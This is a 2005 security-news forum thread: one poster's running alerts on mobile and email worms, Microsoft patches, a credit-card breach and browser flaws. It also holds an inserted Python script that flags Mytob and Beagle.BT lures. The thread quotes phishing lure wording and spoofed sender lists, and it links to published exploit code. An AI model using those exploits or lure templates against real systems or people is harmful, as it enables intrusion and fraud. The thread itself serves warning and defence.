The vulnerability has not been exploited, a moderator of a support forum on the Mozilla Web site wrote Monday, in response to the Secunia alert. For protection, the moderator advises people to close all other windows and tabs before accessing a Web site such as a bank or online store that requires them to type in personal data.
-
June 9, 2005 at 6:46 am #3191844
Skulls.L – Pretends to be pirated version of F-Secure’s Mobile AV product
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
This new variant of the Skulls mobile phone virus appears to be a free “pirated” copy of F-Secure’s Anti-virus product for Mobile phones. Besides the legal and ethical considerations for using pirated copies of software, this new virus will lock the phone permanently until cleaning is accomplished by buying the real product. This social engineering scheme illustrates the dangers of installing free software offered by email, instant messaging, or other sources.
Links related to this new virus are noted below:
Skulls.L – Pretends to be F-Secure’s Mobile AV product
F-Secure’s Web Log Description
Skulls.L is a variant of SymbOS/Skulls.C trojan. The component files of the trojan are almost identical to Skulls.C. The main difference between Skulls.L and Skulls.C is that Skulls.L pretends to be a pirate copied version of F-Secure Mobile Anti-Virus.
REMOVAL Techniques
Disinfection with two Series 60 phones
Download F-Skulls tool from FTP site or
Download F-Skulls Tool directly with phone
1. Install F-Skulls.sis onto the infected phone’s memory card using a clean phone
2. Put the memory card with F-Skulls into the infected phone
3. Start up the infected phone; the application menu should work now
4. Go to the application manager and uninstall the SIS file in which you installed Skulls.L
5. Download and install F-Secure Mobile Anti-Virus to remove any Cabirs dropped by Skulls.L, or with the mobile itself: http://mobile.f-secure.com
6. Remove F-Skulls with the application manager, as the phone is now cleaned
-
June 9, 2005 at 5:32 pm #3192440
Microsoft Security Updates planned for June 14th
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
On June 14, 2005, the Microsoft Security Response Center is planning to release:
Security Updates
• 7 Microsoft Security Bulletins affecting Microsoft Windows. The greatest aggregate, maximum severity rating for these security updates is Critical. Some of these updates will require a restart. 5 of these updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA), 2 of these updates will be detectable using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Windows and Microsoft Services for UNIX. The greatest aggregate, maximum severity rating for these security updates is Moderate. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA) and using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Exchange. The greatest aggregate, maximum severity rating for this security update is Important. This update will not require a restart. This update will be detectable using the Microsoft Baseline Security Analyzer (MBSA) and using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Internet Security and Acceleration (ISA) Server and Small Business Server. The greatest aggregate, maximum severity rating for these security updates is Moderate. These updates may require a restart. This update will be detectable using the Enterprise Scanning Tool (EST).
Microsoft Windows Malicious Software Removal Tool
• Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).
-
June 11, 2005 at 4:22 am #3193113
MS00-037: Hackers use dangerous URLs with a Michael Jackson rumor
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
This email has no attachment, but if you click on the link a trojan horse can be downloaded to your PC. This downloader attack can open up your PC from a security perspective. MS00-037, a five-year-old Help File security flaw, is also used to attack any completely unpatched PCs. While this new threat is not widespread, the media is reporting it on the news this morning.
ZDnet: Hackers use email URL create Jackson rumor
AVOID CLICKING ON THE URL IF YOU RECEIVE THIS EMAIL MESSAGE
News from Neverland — Last night, while in his Neverland Ranch, Michael Jackson has made a suicidal attempt. They suggest this attempt follows the last claim was made against the king of pop. 46-year-old Michael has left a pre-suicide note which describes and interprets some of his sins.
-
June 13, 2005 at 8:22 pm #3192893
Attack of the Mytob worms – Several new variants
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
McAfee has featured a new variant each day in June on average so far. Mytob is one of the most advanced worms that hackers can easily modify. It hides in a stealth-like manner and appears as an email message from an administrator (always verify these types of messages before clicking on either links or attachments).
Mytob may be worst virus of 2005
The Mytob worm has to be close to #1 for the worst worm of 2005. While Netsky.P is #1 in volume (i.e., it’s like the Klez.H worm of old), we can stop this much older version with current virus definitions. Every day the virus writers easily modify the code and seed fresh copies as AV vendors scramble to cover the latest code derivations and compression techniques. We are most likely averaging one new copy per day.
Some key reasons are:
* Stealth-like, as it can hide for a while on an infected PC and lowers security settings.
* Very well socially engineered (appears like an official admin email message),
* Exploits some unpatched Microsoft security vulnerabilities (MS04-011),
* Technically well crafted also (usually carries a Spybot variant)
13 new versions in 13 days
http://vil.nai.com/VIL/newly-discovered-viruses.asp
Virus name / Date discovered / Risk (corporate user) / Risk (home user) / DAT version
W32/Mytob.cv@MM 06/13/2005 Low Low 4513
W32/Mytob.ch@MM 06/11/2005 Low Low 4512
W32/Mytob.cg@MM 06/11/2005 Low Low 4512
W32/Mytob.cc@MM 06/08/2005 Low Low 4510
W32/Mytob.ca@MM 06/08/2005 Low Low 4509
W32/Mytob.bx@MM 06/07/2005 Low Low 4508
W32/Mytob.gen!eml 06/07/2005 Low Low 4508
W32/Mytob.bw@MM 06/06/2005 Low Low 4508
W32/Mytob.bv@MM 06/06/2005 Low Low 4508
W32/Mytob.br@MM 06/05/2005 Low Low 4507
W32/Mytob.bo@MM 06/02/2005 Low Low 4506
W32/Mytob.bl@MM 06/01/2005 Low Low 4505
W32/Mytob.bk@MM 06/01/2005 Low Low 4504
EMAIL messages to avoid
The virus arrives in an email message from a systems administrator as follows:
From: (Spoofed email sender – may choose from the following list)
support
administrator
mail
service
admin
info
register
webmaster
Subject: (Varies, such as)
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitation
Extensions: pif, scr, exe, cmd, bad, zip
-
June 14, 2005 at 8:22 am #3192756
IE 7 will provide better protection from Spyware
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
-
June 14, 2005 at 4:23 pm #3174376
Microsoft Security Updates – June 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft Security Updates – June 2005 Bulletin Summary:
http://www.microsoft.com/technet/security/Bulletin/ms05-Jun.mspx
Critical Bulletins:
Cumulative Security Update for Internet Explorer (883939)
http://www.microsoft.com/technet/security/Bulletin/ms05-025.mspx
Vulnerability in HTML Help Could Allow Remote Code Execution (896358)
http://www.microsoft.com/technet/security/Bulletin/ms05-026.mspx
Vulnerability in Server Message Block Could Allow Remote Code Execution (896422)
http://www.microsoft.com/technet/security/Bulletin/ms05-027.mspx
Important Bulletins:
Vulnerability in Web Client Service Could Allow Remote Code Execution (896426)
http://www.microsoft.com/technet/security/Bulletin/ms05-028.mspx
Vulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow Cross-Site Scripting Attacks (895179)
http://www.microsoft.com/technet/security/Bulletin/ms05-029.mspx
Cumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/ms05-018.mspx
Cumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/ms05-030.mspx
Vulnerability in Step-by-Step Interactive Training Could Allow Remote Code Execution (898458)
http://www.microsoft.com/technet/security/Bulletin/ms05-031.mspx
Moderate Bulletins:
Vulnerability in Microsoft Agent Could Allow Spoofing (890046)
http://www.microsoft.com/technet/security/Bulletin/ms05-032.mspx
Vulnerability in Telnet Client Could Allow Information Disclosure (896428)
http://www.microsoft.com/technet/security/Bulletin/ms05-033.mspx
Cumulative Security Update for ISA Server 2000 (899753)
http://www.microsoft.com/technet/security/Bulletin/ms05-034.mspx
Re-Released Bulletins:
SQL Server Installation Process May Leave Passwords on System (Q263968)
http://www.microsoft.com/technet/security/Bulletin/ms02-032.mspx
ASP.NET Path Validation Vulnerability (887219)
http://www.microsoft.com/technet/security/Bulletin/ms05-004.mspx
Vulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow Cross-Site Scripting Attacks (895179)
http://www.microsoft.com/technet/security/Bulletin/ms05-029.mspx
-
June 17, 2005 at 8:00 pm #3175029
Credit Card Security Breach exposes up to 40 million accounts
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Please check your statements carefully during the next few billing cycles, as hackers recently obtained key information related to MasterCard accounts.
KEY IMPACTS
* As many as 40 million cards may have been exposed, making it the largest breach of personal financial data in a string of recent cases.
* The breach occurred at CardSystems Solutions, Inc., a third-party processor of payment card data that processes transactions on behalf of financial institutions and merchants.
* CardSystems has already taken steps to improve the security of its system; MasterCard said it was giving the company “a limited amount of time” to demonstrate compliance with MasterCard security requirements.
-
June 18, 2005 at 8:00 am #3174983
Spam Analysis – How to examine email header information
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
-
June 18, 2005 at 8:00 pm #3173552
Beagle.BT – (aka Bagle worm) New Variant
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
All new versions of the Bagle/Beagle worm are important to watch as they are technically advanced and disguised well to trick users into opening attachments (use of zip extension).
Beagle.BT – (aka Bagle worm) New Variant
Beagle.BT – new version of Bagle worm
W32.Beagle.BT@mm is a mass-mailing worm that uses its own SMTP engine to send out copies of a Trojan.Tooso variant. The worm also opens a back door on the compromised computer on TCP port 80.
EMAIL FORMAT
From: Spoofed.
Subject: Blank.
Message: “The password is” or “Password:”
Attachment: ZIP … Multiple Zip files may contain copies of the virus, plus an executable copy of the Trojan.Tooso.
-
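A gateway-style triage check for the two lure patterns quoted in this thread: the Mytob spoofed-administrator messages (sender names, subject lines and extensions listed in the Mytob post) and the Beagle.BT format in this post (spoofed sender, blank subject, “The password is” / “Password:” body, ZIP attachments). This is an added example, not McAfee, Symantec or poster code; the `Message` class, function names and the sample mailbox are constructed for illustration.

```python
"""Heuristic triage for the Mytob and Beagle.BT e-mail lures described in this thread.

Added example, not vendor code. The sender, subject and extension lists are the ones
quoted in the Mytob post; the Beagle.BT rule follows the Symantec description quoted above.
"""
from dataclasses import dataclass, field
from typing import List

# Spoofed local parts the Mytob post lists for the forged "administrator" sender
MYTOB_SENDERS = {"support", "administrator", "mail", "service",
                 "admin", "info", "register", "webmaster"}

# Subject lines from the post, case-folded for comparison
MYTOB_SUBJECTS = {s.lower() for s in (
    "Your password has been updated",
    "Your password has been successfully updated",
    "You have successfully updated your password",
    "Your new account password is approved",
    "Your Account is Suspended",
    "*DETECTED* Online User Violation",
    "Your Account is Suspended For Security Reasons",
    "Warning Message: Your services near to be closed.",
    "Important Notification",
    "Members Support",
    "Security measures",
    "Email Account Suspension",
    "Notice of account limitation",
)}

# Attachment extensions exactly as listed in the post ("bad" reproduced as printed there)
MYTOB_EXTENSIONS = {"pif", "scr", "exe", "cmd", "bad", "zip"}

# Body phrases Symantec gives for Beagle.BT
BEAGLE_BODY_MARKERS = ("The password is", "Password:")


@dataclass
class Message:
    """Minimal view of an inbound mail; a real gateway would fill this from the headers."""
    sender: str
    subject: str
    body: str
    attachments: List[str] = field(default_factory=list)


def local_part(address: str) -> str:
    """'Alice <alice@example.net>' -> 'alice' (display name stripped, case-folded)."""
    addr = address.split("<")[-1].rstrip(">").strip()
    return addr.split("@")[0].lower()


def extension(filename: str) -> str:
    """Last extension only, so a double extension like 'invoice.txt.exe' counts as 'exe'."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def mytob_indicators(msg: Message) -> List[str]:
    """Return the Mytob traits present in the message (empty list means none)."""
    found = []
    if local_part(msg.sender) in MYTOB_SENDERS:
        found.append("sender")
    if msg.subject.strip().lower() in MYTOB_SUBJECTS:
        found.append("subject")
    if any(extension(a) in MYTOB_EXTENSIONS for a in msg.attachments):
        found.append("attachment")
    return found


def is_beagle_bt(msg: Message) -> bool:
    """Blank subject, a password phrase in the body and at least one ZIP attachment."""
    return (msg.subject.strip() == ""
            and any(marker in msg.body for marker in BEAGLE_BODY_MARKERS)
            and any(extension(a) == "zip" for a in msg.attachments))


def classify(msg: Message) -> str:
    """Verdict: 'beagle.bt', 'mytob', 'suspicious' or 'clean'.

    Mytob needs the dangerous attachment plus a spoofed-sender or subject trait;
    sender/subject alone (which a genuine helpdesk notice can match) is only 'suspicious'.
    """
    if is_beagle_bt(msg):
        return "beagle.bt"
    traits = mytob_indicators(msg)
    if "attachment" in traits and len(traits) >= 2:
        return "mytob"
    if traits:
        return "suspicious"
    return "clean"


# Constructed sample mailbox (not real captures)
SAMPLE_MESSAGES = {
    "m1": Message("administrator@example.com", "Your Account is Suspended",
                  "See the attached document.", ["account-report.zip"]),
    "m2": Message("Alice <alice@example.net>", "",
                  "The password is 31415", ["photos.zip", "photos2.zip"]),
    "m3": Message("support@example.com", "Your password has been updated",
                  "Your password was changed by the helpdesk.", []),
    "m4": Message("bob@example.org", "Lunch tomorrow?", "Menu attached.", ["menu.pdf"]),
}

if __name__ == "__main__":
    for mid, msg in SAMPLE_MESSAGES.items():
        print(mid, classify(msg))
```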
June 20, 2005 at 8:00 am #3173304
40,000,000 credit cards exposed – an update
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Sharing a quick update on latest discoveries. The primary cause of this exposure is improper storage and use of confidential information on their servers, followed by hackers discovering this due to weak security controls.
1. A new phishing attack has been launched to capitalize on this
http://www.theregister.co.uk/2005/06/20/mastercard_phishing/
Quote: From: Master Bank [master@masterbank.com] To: Subject: **Your Mastercard online Confirmation** Dear User, During our regular update and verification of the accounts, we couldn’t verify your current information. Either your information has changed or it is incomplete. If the account information is not updated to current information within 5 days then, your access will be restricted.
2. According to reports, 68,000 MasterCard cardholders have already found fraudulent charges on their accounts.
3. The head of a credit card processing company whose Tucson center was hit by computer hackers says compromised consumer records shouldn’t even have been in the data base. Under rules established by Visa and MasterCard, processors aren’t supposed to retain cardholder information after handling transactions.
4. CardSystems Solutions C-E-O John Perry tells The New York Times the data was being stored for “research purposes” to determine why some transactions registered as unauthorized or uncompleted.
5. He says that the records known to have been stolen covered roughly 200-thousand of the 40 (m) million compromised credit card accounts. They include Visa, Mastercard and other companies.
-
June 20, 2005 at 8:00 pm #3175776
Opera 8.01 released to patch security issues
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
QUOTE: Opera Software today released the first Opera 8 update, Opera 8.01, for Windows and Linux. To fine-tune the well-received browser, Opera 8.01 includes security and small bug fixes as well as JavaScript improvements. This update succeeds the release of Opera 8 on April 19, 2005, which has now reached more than five million downloads.
Accompanying the Opera 8.01 release for Windows and Linux is the final version of Opera 8 for Macintosh. Read the press release.
To download Opera 8 visit http://www.opera.com/download/
View the changelog.
-
June 21, 2005 at 12:00 pm #3175445
TechNet – Some free e-learning resources for SQL-Server 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Click Here: Microsoft resources to prepare for SQL-Server 2005
quote: Microsoft Learning Resources
Whether you are interested in database administration, database development, or business intelligence, you will find classroom training, books, free skills assessments, and free* e-learning to help you get up to speed on the newest features of the software. The online assessments help you analyze your current skills, and provide you with a learning plan that recommends books, e-learning, classroom training, TechNet and MSDN resources. Our E-Learning courses are an effective way to learn on your own schedule and feature hands-on virtual labs that provide an in-depth, online training experience.
-
June 21, 2005 at 8:00 pm #3175278
Multiple browsers are vulnerable to the Dialog Origin Spoofing Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Secunia Research has discovered a vulnerability in various browsers, which can be exploited by malicious web sites to spoof dialog boxes. The problem is that JavaScript dialog boxes do not display or include their origin, which allows a new window to open e.g. a prompt dialog box, which appears to be from a trusted site.
– Mozilla / Firefox / Camino Dialog Origin Spoofing Vulnerability
– Microsoft Internet Explorer Dialog Origin Spoofing Vulnerability
– Opera Dialog Origin Spoofing Vulnerability
If you go to the test page, please make sure no critical applications are open and test cautiously:
-
June 22, 2005 at 8:00 pm #3179015
Microsoft’s Security Guidance Center
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft’s Security Guidance Center
Home Security Protection
Get the information you need to protect your home PC. This site puts valuable tips, tools, and training at your fingertips.
Learn about Computer Security At Home
Security for IT Professionals
Find the tools, training, and updates you need to assist with planning and managing a security strategy for your organization.
Find answers in the TechNet Security Center
Small Business Security Protection
Access important resources for updating software, setting up a firewall, and backing up data in a small business environment.
Visit the Small Business Security Guidance Center
Designing and Developing Secure Applications
Learn how to write more secure code with these developer-focused articles, tools, and security resources.
-
June 23, 2005 at 12:05 pm #3177732
Microsoft Technet – Security Planning Guides
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The June 2005 TechNet security newsletter featured the following security planning guides:
Review the Latest Microsoft Server Security Guides
-
June 24, 2005 at 4:04 am #3176802
MS05-011 – Exploit Code to attack SMB vulnerabilities published
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Hopefully, most companies and individuals are up to date on Microsoft security patches. This new exploit developed in February could be used in future computer viruses and worms.
MS05-011 – Exploit Code to attack SMB vulnerabilities published
http://isc.sans.org/diary.php?date=2005-06-23
QUOTE: FrSIRT has published exploit code for the recent flaw in Microsoft Server Message Block (SMB). The advisory and patch related to this vulnerability were released on February 8th, 2005. If you still have not patched, you are further urged to do so in light of the release of exploit code.
FrSIRT – Published exploit (be careful, as PoC code is here)
http://www.frsirt.com/exploits/20050623.mssmb_poc.c.php
-
June 25, 2005 at 8:04 am #3178473
MS05-030: Microsoft Outlook Express NNTP Buffer Overflow Exploit
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Hopefully, most companies and individuals are up-to-date on Microsoft security patches. This new exploit has just been developed from the MS05-030 security bulletin published in June. It could be adapted for use in future computer viruses and worms.
MS05-030: Microsoft Outlook Express NNTP Buffer Overflow Exploit
http://www.frsirt.com/exploits/20050624.MS05-030-NNTP.c.php
MS05-030: Cumulative Security Update in Outlook Express (897715)
http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx
-
June 26, 2005 at 4:04 am #3176593
Microsoft Tech-Ed 2005 post conference resources
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
I’ve attended two past Tech Ed conferences and they provide highly focused technical training opportunities. Microsoft shares a number of post-conference links and publications as noted below:
http://microsoft.sitestream.com/teched2005/
- Track Descriptions
- Keynotes
- Strategic Briefings
- Breakout Sessions
- Manuals for Hands on Labs & Instructor Led Labs
- Continuing Your Education
-
June 26, 2005 at 4:04 am #3176594
Veritas Backup Software – Remote Control Exploit in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The Veritas Backup utility suites offer advanced functionality, and some of the security controls associated with the remote control functionality have been compromised. This includes a new in-the-wild exploit, and administrators should review trusted firewall port settings and move to the latest versions of the software as noted in the advisories below.
http://isc.sans.org/diary.php?date=2005-06-25
QUOTE: “We received some reports about spikes on port 10000. The main reason for that is the release of the exploit for Veritas, and used by the Metasploit Framework. … It seems this exploit is crashing the service listening on port 10000. If sysadmins know they have backup exec installed and they scan the system they will see port 6101 and 10000 normally. After the exploit it will show only the port 6101 still listening.”
Veritas Security Bulletins
Veritas Backup Exec/NetBackup Request Packet Denial Of Service Vulnerability
Veritas Backup Exec Server Remote Registry Access Vulnerability
Veritas Backup Exec Remote Agent Null Pointer Dereference Denial Of Service Vulnerability
Veritas Backup Exec Remote Agent for Windows Servers Authentication Buffer Overflow Vulnerability
Veritas Backup Exec Admin Plus Pack Option Remote Heap Overflow Vulnerability
VERITAS Backup Exec Web Administration Console Remote Buffer Overflow Vulnerability
FrSirt – Veritas Backup Exec Agent “CONNECT_CLIENT_AUTH” Request Exploit
http://www.frsirt.com/exploits/20050625.backupexec_agent.pm.php
-
June 30, 2005 at 8:04 am #3187357
MS05-017 Exploit has been published
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-06-28
The FrSIRT published a new exploit for the MS05-017 vulnerability. MS05-017 is a vulnerability in Message Queuing; a remote attacker can execute commands remotely. It’s time to patch and filter some unnecessary ports.
-
June 30, 2005 at 10:39 am #3187234
phpBB 2.0.16 Fixes a Critical Security Issue
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-06-29
If you’re using the popular phpBB bulletin board package, it’s time to upgrade. Version 2.0.16, released earlier this week, fixes a critical security issue that can lead to the compromise of the vulnerable web server. The problem is with the viewtopic.php script, which, according to the FrSIRT advisory, fails to properly validate input when processing the “highlight” parameter. A similar vulnerability was being exploited by the Santy worm to deface web sites about half a year ago, as we reported in the December 21, 2004 diary. Please update your copy of phpBB to help prevent another such worm from gaining steam.
For information about the phpBB 2.0.16 release, see the phpBB Group announcement. You can get the updated package from their downloads page.
-
July 1, 2005 at 9:03 pm #3187564
ISC Warning — Be on the Lookout for PHP compromises
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
ISC Warning — Be on the Lookout for PHP compromises
Quote: Be on the Lookout for PHP compromises
This is a call to all the network and system security folks out there … Please be on the lookout for web-based intrusions happening in your environments. There have recently been major vulnerabilities discovered in phpBB and the XML_RPC libraries, which we have reported in the last two days.
It’s very likely that these vulnerabilities will be utilized to compromise systems. Try to be vigilant about securing your environment and reviewing your IDS alerts for attacks.
-
July 1, 2005 at 9:03 pm #3187563
Sophos measures Internet Survival time at 12 Minutes
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Internet Survival Time is measured as the amount of time a brand new unpatched PC will last before it is compromised by a computer virus. However, XP SP2 provides out-of-the-box protection from all current Internet worms. The 12 minutes are because Internet worms like Blaster (MS03-026) and Sasser (MS04-011) continue to circulate and randomly generate IP addresses to attack, from unpatched versions of W/2000 and XP.
Internet Survival Time by Sophos
Anti-virus company Sophos published their own statistic regarding internet survival time at 12 minutes. The survival time currently reported by dshield.org is 31 minutes. Their story also has some interesting statistics on the number of viruses in the first half of 2005 compared to last year.
ISC Link – Sophos measures Internet Survival time at 12 Minutes
-
July 2, 2005 at 5:03 am #3185490
Sophos Virus Report – First Half of 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Sophos Virus Report – First Half of 2005
Sophos – TOP TEN VIRUSES FOR 1ST HALF OF 2005
1 W32/Zafi-D 25.3%
2 W32/Netsky-P 17.5%
3 W32/Sober-N 10.3%
4 W32/Zafi-B 4.7%
5 W32/Netsky-D 3.8%
6 W32/Mytob-BE 2.6%
7 W32/Netsky-Z 2.3%
8 W32/Mytob-AS 2.0%
9 W32/Netsky-B 1.9%
10 W32/Sober-K 1.7%
Others 27.9%
-
July 2, 2005 at 5:03 am #3185491
Internet Explorer – Microsoft Security Advisory 903144
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Microsoft is proactively warning of a new flaw in IE that can cause it to unexpectedly exit and execute arbitrary code. No in-the-wild attacks have been reported, but the vulnerability could be used in future virus attacks.
Key protective advice includes:
1. “Think before you click” – Never select untrusted URLs in email or at other websites.
2. Always make sure IE is set to PROMPT for the installation of ActiveX controls from a website in all zones.
3. The Security Advisory lists other methods (e.g., removing the Microsoft Java Virtual Machine or unregistering Javaprxy.dll). I’d be careful with this as it could break application packages built around these services.
ZDNet Article: Microsoft warns of unpatched IE flaw
Microsoft Security Advisory (903144)
Microsoft is investigating a new public report of a vulnerability affecting Internet Explorer. “We have not been made aware of any attacks attempting to use the reported vulnerability or customer impact at this time,” Microsoft said Thursday in its advisory. “But we are aggressively investigating the public report.”
A patch for the flaw is not available. As an interim measure, the software giant advises people to set their Internet and local intranet security zone settings to “high” before running ActiveX controls.
-
July 3, 2005 at 5:02 am #3185288
Windows 2000 SP4 – Rollup Security Update through April 2005
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
The new security rollup for Service Pack 4 is particularly helpful if you need to rebuild a Windows 2000 workstation manually.
Microsoft Security Advisory (891861)
http://www.microsoft.com/technet/security/advisory/891861.mspx
Microsoft Technet Information (891861)
http://support.microsoft.com/kb/891861
Release of Update Rollup 1 for Windows 2000 Service Pack 4 (SP4)
Published: June 28, 2005
Today we are announcing the availability of the Update Rollup 1 for Windows 2000 Service Pack 4 (SP4). The Update Rollup will make it easier for customers to improve security of Windows 2000 systems, keep them up to date, and to build new deployment images.
The Update Rollup contains all security updates produced for Windows 2000 between the time SP4 was released and April 30, 2005, the time when the contents of the Update Rollup were locked down for final testing by Microsoft and by external beta & customer sites. The Update Rollup also contains a number of updates that increase system security, reliability, reduce support costs, and support the current generation of PC hardware.
We encourage Windows 2000 SP4 customers to install this update. For more information about this release, see Microsoft Knowledge Base Article 891861.
-
July 3, 2005 at 1:03 pm #3185242
Internet Storm Center – Storm clouds on the horizon?
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Usually, the first of every month you can anticipate new variants of: Sober, Bagle, MyDoom, and Mytob to all emerge. The ISC sees 3 potential factors to be EXTRA watchful this week for new threats to emerge:
Internet Storm Center — Possibility for disaster?
http://isc.sans.org/diary.php?date=2005-07-03
Quote: At the Internet Storm Center, we sometimes see dark clouds gathering on the horizon. Sometimes it doesn’t come to a real storm, sometimes it does. Unlike the real storm centers we don’t have mathematical models to help in our predictions just yet. The main problem is that it would mean we’d have to predict human nature.
1. As a first ingredient we have the probing and even at least one worm/botnet on the loose attacking unpatched phpBB installations.
2. As a second ingredient we see the 0-day exploits and the lack of a real patch from Microsoft for the javaprxy.dll . This makes the most popular browser potentially seriously vulnerable as this exploit matures.
3. The final ingredient is timing: in the US it’s Independence Day tomorrow, which most probably only leaves a skeleton staff at key places.
-
July 8, 2005 at 5:02 am #3183160
Internet Explorer Workaround for Javaprxy.dll vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
I have installed the latest patch which disables Javaprxy.dll (a DLL service used for Java debugging). It’s safe to disable this rarely used facility and I’ve had zero issues thus far.
Microsoft updated their security advisory (903144) about a COM object (Javaprxy.dll) which can cause Internet Explorer to unexpectedly exit. The advisory was updated with Microsoft Download Center information for the registry key update that disables Javaprxy.dll in Internet Explorer. This is still only a workaround; no official patch is available yet.
1. To install this patch, select this link security advisory
2. Then expand the WORKAROUNDS information and select this link
Disable the Javaprxy.dll COM object from running in Internet Explorer
3. Download the specific patch for your version of Internet Explorer (select Help/About if you’re unsure which version of IE you are using).
-
July 8, 2005 at 9:03 am #3182678
New series of Trojan Horses attack corporate networks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
An outbreak of Trojan horse programs is hitting networks around the world, an e-mail security company has warned. MessageLabs said it has blocked 54,000 copies of new Downloader Trojans since 6 p.m. PDT on Wednesday.
-
July 9, 2005 at 9:02 am #3169576
CERT WARNING – Targeted Trojan Email Attacks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
As noted yesterday some corporate users in TVDUG have reported seeing a marked increase in intercepting new trojan horse emails this week. CERT has also issued a special security bulletin to warn of targeted attacks. It is informative and users should be cautious at all times when processing email messages.
http://www.us-cert.gov/cas/techalerts/TA05-189A.html
The United States Computer Emergency Readiness Team (US-CERT) has received reports of an email based technique for spreading trojan horse programs. A trojan horse is an attack method by which malicious or harmful code is contained inside apparently harmless files. Once opened, the malicious code can collect unauthorized information that can be exploited for various purposes, or permit computers to be used surreptitiously for other malicious activity. The emails are sent to specific individuals rather than the random distributions associated with a phishing attack or other trojan activity. (Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that can be used for identity theft.) These attacks appear to target US information for exfiltration. This alert seeks to raise awareness of this kind of attack, highlight the important need for government and critical infrastructure systems owners and operators to take appropriate measures to protect their data, and provide guidance on proper protective measures.
-
July 9, 2005 at 9:02 am #3169577
Microsoft Security Bulletins Preview – July 12, 2005
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
On 12 July 2005 Microsoft is planning to release Windows and Office security updates.
*************************************************
Title: July 2005 Microsoft Security Response Center Bulletin
Issued: July 7, 2005
*************************************************
Security Updates
2 Microsoft Security Bulletins affecting Microsoft Windows. The greatest aggregate, maximum severity rating for these bulletins is Critical. Some of these updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
1 Microsoft Security Bulletin affecting Microsoft Office. The greatest aggregate, maximum severity rating for this bulletin is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
Microsoft Windows Malicious Software Removal Tool – Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).
-
July 9, 2005 at 9:02 am #3169578
TROJ_DONBOMB.A – Fake CNN movie circulating on London attacks
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This is an example of tactics some virus writers will revert to in order to create a system infection. Avoid selecting attachments found in any email message.
This particular attack can be deceptive as it appears to be legitimate as part of an actual CNN webpage is used. Be careful on all emails relating to tragedies or political themes as this is a common social engineering approach.
TROJ_DONBOMB.A – Fake CNN movie circulating on London attacks
Subject: TERROR HITS LONDON
From: “CNN Newsletter” {breakingnews@cnnonline.com}
Message body: {A modified HTML copy of the CNN web page regarding the London Bombing}
Attachment: LondonTerrorMovie.zip (containing the following .ZIP files) London Terror Moovie.avi – multiple spaces
Note: These details may vary since affected systems can become proxy servers.
